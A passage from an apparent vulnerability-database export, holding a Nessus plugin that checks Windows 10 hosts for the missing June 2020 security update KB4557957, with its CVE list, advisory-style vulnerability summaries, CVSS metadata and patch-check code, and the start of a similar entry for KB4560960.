\"CVE-2020-1233\",\n \"CVE-2020-1234\",\n \"CVE-2020-1235\",\n \"CVE-2020-1236\",\n \"CVE-2020-1237\",\n \"CVE-2020-1238\",\n \"CVE-2020-1239\",\n \"CVE-2020-1241\",\n \"CVE-2020-1242\",\n \"CVE-2020-1244\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1248\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1257\",\n \"CVE-2020-1258\",\n \"CVE-2020-1259\",\n \"CVE-2020-1261\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1264\",\n \"CVE-2020-1266\",\n \"CVE-2020-1268\",\n \"CVE-2020-1269\",\n \"CVE-2020-1270\",\n \"CVE-2020-1271\",\n 
\"CVE-2020-1272\",\n \"CVE-2020-1273\",\n \"CVE-2020-1274\",\n \"CVE-2020-1275\",\n \"CVE-2020-1276\",\n \"CVE-2020-1277\",\n \"CVE-2020-1278\",\n \"CVE-2020-1279\",\n \"CVE-2020-1280\",\n \"CVE-2020-1281\",\n \"CVE-2020-1282\",\n \"CVE-2020-1283\",\n \"CVE-2020-1284\",\n \"CVE-2020-1286\",\n \"CVE-2020-1287\",\n \"CVE-2020-1290\",\n \"CVE-2020-1291\",\n \"CVE-2020-1292\",\n \"CVE-2020-1293\",\n \"CVE-2020-1294\",\n \"CVE-2020-1296\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1304\",\n \"CVE-2020-1305\",\n \"CVE-2020-1306\",\n \"CVE-2020-1307\",\n \"CVE-2020-1309\",\n \"CVE-2020-1311\",\n \"CVE-2020-1312\",\n \"CVE-2020-1313\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1316\",\n \"CVE-2020-1317\",\n \"CVE-2020-1324\",\n \"CVE-2020-1334\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4557957\");\n script_xref(name:\"MSFT\", value:\"MS20-4557957\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0256-S\");\n\n script_name(english:\"KB4557957: Windows 10 Version 2004 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4557957.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. 
An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1273, CVE-2020-1274, CVE-2020-1275,\n CVE-2020-1276, CVE-2020-1307, CVE-2020-1316)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A vulnerability exists in the way the Windows\n Diagnostics & feedback settings app handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could cause additional diagnostic data\n from the affected device to be sent to Microsoft.\n (CVE-2020-1296)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. 
(CVE-2020-1290)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - A denial of service vulnerability exists when Connected\n User Experiences and Telemetry Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could cause a system to\n stop responding. (CVE-2020-1120, CVE-2020-1244)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. 
There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1238,\n CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the\n Windows Feedback Hub improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1199)\n\n - An information disclosure vulnerability exists in the\n way that the Microsoft Server Message Block 3.1.1\n (SMBv3) protocol handles certain requests. An attacker\n who successfully exploited the vulnerability could\n obtain information to further compromise the users\n system. (CVE-2020-1206)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when\n Windows Mobile Device Management (MDM) Diagnostics\n improperly handles junctions. An attacker who\n successfully exploited this vulnerability could bypass\n access restrictions to delete files. (CVE-2020-1204)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Now Playing Session Manager handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1201)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. 
(CVE-2020-1271)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the Connected Devices Platform Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when\n Windows Kernel fails to properly sanitize certain\n parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1257, CVE-2020-1278,\n CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Bluetooth Service handles objects\n in memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1280)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. 
An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1248)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could read memory that was freed and might run arbitrary\n code in an elevated context. An attacker could exploit\n this vulnerability by running a specially crafted\n application on the victim system. The update addresses\n the vulnerability by correcting the way the Windows\n Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - An information disclosure vulnerability exists when a\n Windows service improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. 
(CVE-2020-1268)\n\n - An elevation of privilege vulnerability exists when the\n Windows Update Orchestrator Service improperly handles\n file operations. An attacker who successfully exploited\n this vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Update Orchestrator\n Service handles file operations. (CVE-2020-1313)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability\n exists in Windows Security Health Service when handling\n certain objects in memory. (CVE-2020-1162,\n CVE-2020-1324)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235,\n CVE-2020-1282, CVE-2020-1304, CVE-2020-1306,\n CVE-2020-1334)\n\n - An elevation of privilege vulnerability exists when the\n Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. 
(CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. 
The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network List Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1209)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1277,\n CVE-2020-1302, CVE-2020-1312)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2020-1242)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when\n Windows Lockscreen fails to properly load spotlight\n images from a secure location. An attacker who\n successfully exploited the vulnerability could execute\n commands with elevated permissions. An authenticated\n attacker could modify a registry value to exploit this\n vulnerability. The security update addresses the\n vulnerability by ensuring that the spotlight images are\n always loaded from a secure location. 
(CVE-2020-1279)\n\n - An elevation of privilege vulnerability exists in\n OpenSSH for Windows when it does not properly restrict\n access to configuration settings. An attacker who\n successfully exploited this vulnerability could replace\n the shell with a malicious binary. (CVE-2020-1292)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. 
(CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - A denial of service vulnerability exists in the way that\n the Microsoft Server Message Block 3.1.1 (SMBv3)\n protocol handles certain requests. An authenticated\n attacker who successfully exploited this vulnerability\n against an SMB Server could cause the affected system to\n crash. An unauthenticated attacker could also exploit\n this vulnerability against an SMB client and cause\n the affected system to crash. (CVE-2020-1284)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-1283)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when the Microsoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the user's system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. 
An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. 
An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1258)\");\n # https://support.microsoft.com/en-us/help/4557957/windows-10-update-kb4557957\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e4706967\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4557957.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1307\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Windows Update Orchestrator unchecked ScheduleWork call');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-06\";\nkbs = make_list('4557957');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"19041\",\n rollup_date:\"06_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4557957])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T09:41:16", "description": "The remote Windows host is missing security update 4560960. It is, \ntherefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. 
An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1273, CVE-2020-1274, CVE-2020-1275,\n CVE-2020-1276, CVE-2020-1307, CVE-2020-1316)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A vulnerability exists in the way the Windows\n Diagnostics & feedback settings app handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could cause additional diagnostic data\n from the affected device to be sent to Microsoft.\n (CVE-2020-1296)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. 
An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. 
(CVE-2020-1238,\n CVE-2020-1239)\n\n - An information disclosure vulnerability exists in the\n way that the Microsoft Server Message Block 3.1.1\n (SMBv3) protocol handles certain requests. An attacker\n who successfully exploited the vulnerability could\n obtain information to further compromise the users\n system. (CVE-2020-1206)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when\n Windows Mobile Device Management (MDM) Diagnostics\n improperly handles junctions. An attacker who\n successfully exploited this vulnerability could bypass\n access restrictions to delete files. (CVE-2020-1204)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Now Playing Session Manager handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1201)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-1283)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. 
(CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the Connected Devices Platform Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when\n Windows Kernel fails to properly sanitize certain\n parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1257, CVE-2020-1278,\n CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Bluetooth Service handles objects\n in memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1280)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1248)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. 
An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could read memory that was freed and might run arbitrary\n code in an elevated context. An attacker could exploit\n this vulnerability by running a specially crafted\n application on the victim system. The update addresses\n the vulnerability by correcting the way the Windows\n Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when a\n Windows service improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1268)\n\n - An elevation of privilege vulnerability exists when the\n Windows Update Orchestrator Service improperly handles\n file operations. An attacker who successfully exploited\n this vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. 
The update addresses the vulnerability by\n correcting the way the Windows Update Orchestrator\n Service handles file operations. (CVE-2020-1313)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability\n exists in Windows Security Health Service when handling\n certain objects in memory. (CVE-2020-1162,\n CVE-2020-1324)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the\n Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. 
